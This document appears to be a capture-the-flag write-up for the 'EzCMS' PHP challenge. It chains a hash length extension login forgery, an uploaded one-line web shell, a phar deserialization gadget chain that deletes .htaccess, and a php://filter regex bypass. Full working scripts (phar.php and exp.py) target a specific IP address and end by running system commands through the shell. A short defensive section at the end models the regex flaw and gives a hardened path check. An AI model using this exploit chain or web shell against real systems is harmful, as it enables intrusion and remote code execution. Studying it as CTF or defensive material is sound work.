[Web] EzCMS - LanceaKing xp0int Posted on Sep 11 2019

/www.zip contains the source code.

## Hash length extension attack

Check the admin password in /config.php:

![title](https://leanote.com/api/file/getImage?fileId=5d751653ab644162bb0074c4)

It gives `md5($secret.'adminadmin')==='52107b08c0f3342d2153ae1d68e6262c'`. This is obviously a hash length extension attack: the extension goes after the password.

## Uploading a shell

Even though .htaccess imposes restrictions, a shell can still be uploaded. `<?php @$_REQUEST[f]($_REQUEST[x]);` gets past $black_list.

## Deleting .htaccess through the deserialization vulnerability

A deserialization vulnerability shows up here:

![title](https://leanote.com/api/file/getImage?fileId=5d7519b8ab644162bb007581)

If the path uses the phar protocol, `mime_content_type()` deserializes the metadata inside the phar file. The only deserialization magic method is `File::__destruct`:

![title](https://leanote.com/api/file/getImage?fileId=5d751aa0ab644160a90074ce)

It looks like `File::checker = Admin`, but there is another suspicious spot: `Profile::__call`

![title](https://leanote.com/api/file/getImage?fileId=5d751bd6ab644162bb0075f2)

`ZipArchive::open` takes exactly two parameters and can be used to delete files:

![title](https://leanote.com/api/file/getImage?fileId=5d751e59ab644162bb00768b)

So the correct chain is `Profile::admin = ZipArchive; File::checker = Profile`.

To get the phar protocol past the regex, just prepend the php protocol: `php://filter/convert.base64-encode/resource=phar://...`

## phar.php

```php
<?php
class File
{
    public $filename;
    public $filepath;
    public $checker;

    function __construct()
    {
        // checker is a Profile, so __destruct -> upload_file() lands in Profile::__call
        $this->checker = new Profile();
    }

    // function __destruct()
    // {
    //     if (isset($this->checker)) {
    //         $this->checker->upload_file();
    //     }
    // }
}

class Profile
{
    public $username;
    public $password;
    public $admin;

    public function __construct()
    {
        // delete .htaccess: __call forwards to ZipArchive::open($username, $password)
        $this->admin = new ZipArchive;
        $this->username = '/var/www/html/sandbox/03bc7306053517499b851326b9bcdeeb/.htaccess';
        $this->password = ZipArchive::OVERWRITE;
    }

    // function __call($name, $arguments)
    // {
    //     $this->admin->open($this->username, $this->password);
    // }
}

$phar = new Phar('phar.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
$phar->setStub("<?php var_dump('HaHa!'); __HALT_COMPILER(); ?>");
$o = new File();
$phar->setMetadata($o);   // the File object is deserialized when the phar is read
$phar->stopBuffering();
```

The path of the file to delete must be absolute, otherwise it won't be deleted.

## exp.py

```python
# Python 2 script: print statements, urllib.quote and the hashpumpy module.
from hashlib import md5
from urllib import quote
from requests import Session
from hashpumpy import hashpump

BASE = 'http://112.126.102.158:9999'

# crack password: forge md5($secret . 'adminadmin') without knowing $secret
username = password = 'admin'
h1 = '52107b08c0f3342d2153ae1d68e6262c'   # known hash from config.php
d1 = username + password                  # known data the secret is prepended to
sn = 8                                    # guessed length of $secret
h2, d2 = hashpump(h1, d1, 'a', sn)        # h2: extended hash, d2: d1 + padding + 'a'
password = d2[len(username):]             # extended data minus the username prefix
print 'username: ' + username
print 'password: ' + quote(password)
print 'cookie: user=' + h2

sess = Session()

# login
sess.cookies.set('user', h2)
data = {'username': username, 'password': password}
sess.post(BASE + '/index.php', data=data)

# upload shell (stored under md5(original name) + '.php')
shell = 'shell.php'
files = {'file': (shell, '<?php @$_REQUEST[f]($_REQUEST[x]);')}
sess.post(BASE + '/upload.php', files=files)
shellpath = md5(shell).hexdigest() + '.php'

# delete .htaccess: upload phar.phar, then make view.php run mime_content_type() on it
phar = 'phar.phar'
files = {'file': open(phar, 'rb')}
sess.post(BASE + '/upload.php', files=files)
filename = md5(phar).hexdigest() + '.phar'
filepath = (
    'php://filter/convert.base64-encode/resource='
    'phar://./sandbox/03bc7306053517499b851326b9bcdeeb/%s/test.txt' % filename)
params = {'filename': filename, 'filepath': filepath}
sess.get(BASE + '/view.php', params=params)

# run a command through the uploaded shell
params = {'f': 'system', 'x': 'cat /flag'}
r = sess.get(
    BASE + '/sandbox/03bc7306053517499b851326b9bcdeeb/' + shellpath,
    params=params)
print r.text
```
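The regex bypass above works because the check is anchored to the start of the string. The following is an added example, not the challenge's PHP or the author's code: it models that prefix-only check in Python beside a hardened `filepath` check that rejects any stream wrapper anywhere in the value and confines the path to the sandbox directory. The function names and the sandbox root constant are assumptions chosen for the example.

```python
import os
import re

# Constructed stand-in for the challenge's per-user sandbox directory.
SANDBOX_ROOT = "/var/www/html/sandbox/03bc7306053517499b851326b9bcdeeb"

# Prefix-anchored check of the kind the php://filter trick slips past.
NAIVE_PHAR_RE = re.compile(r"^phar://", re.IGNORECASE)

# Any "scheme://" anywhere in the value: php://, phar://, file://, ...
ANY_WRAPPER_RE = re.compile(r"[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def naive_check(filepath):
    """True if the prefix-only regex lets the value through."""
    return NAIVE_PHAR_RE.search(filepath) is None


def hardened_check(filepath, root=SANDBOX_ROOT):
    """True only for a wrapper-free path that stays inside root.

    Rejects NUL bytes (PHP path truncation), any scheme:// wrapper
    wherever it appears, and paths that escape root after
    normalisation. A real deployment would use realpath() on the
    filesystem so symlinks are resolved too; normpath keeps this offline.
    """
    if "\x00" in filepath or ANY_WRAPPER_RE.search(filepath):
        return False
    resolved = os.path.normpath(os.path.join(root, filepath))
    return resolved == root or resolved.startswith(root + os.sep)


# Constructed sample of the bypass value from exp.py (hash part is a placeholder).
BYPASS = ("php://filter/convert.base64-encode/resource="
          "phar://./sandbox/03bc7306053517499b851326b9bcdeeb/PLACEHOLDER.phar/test.txt")
```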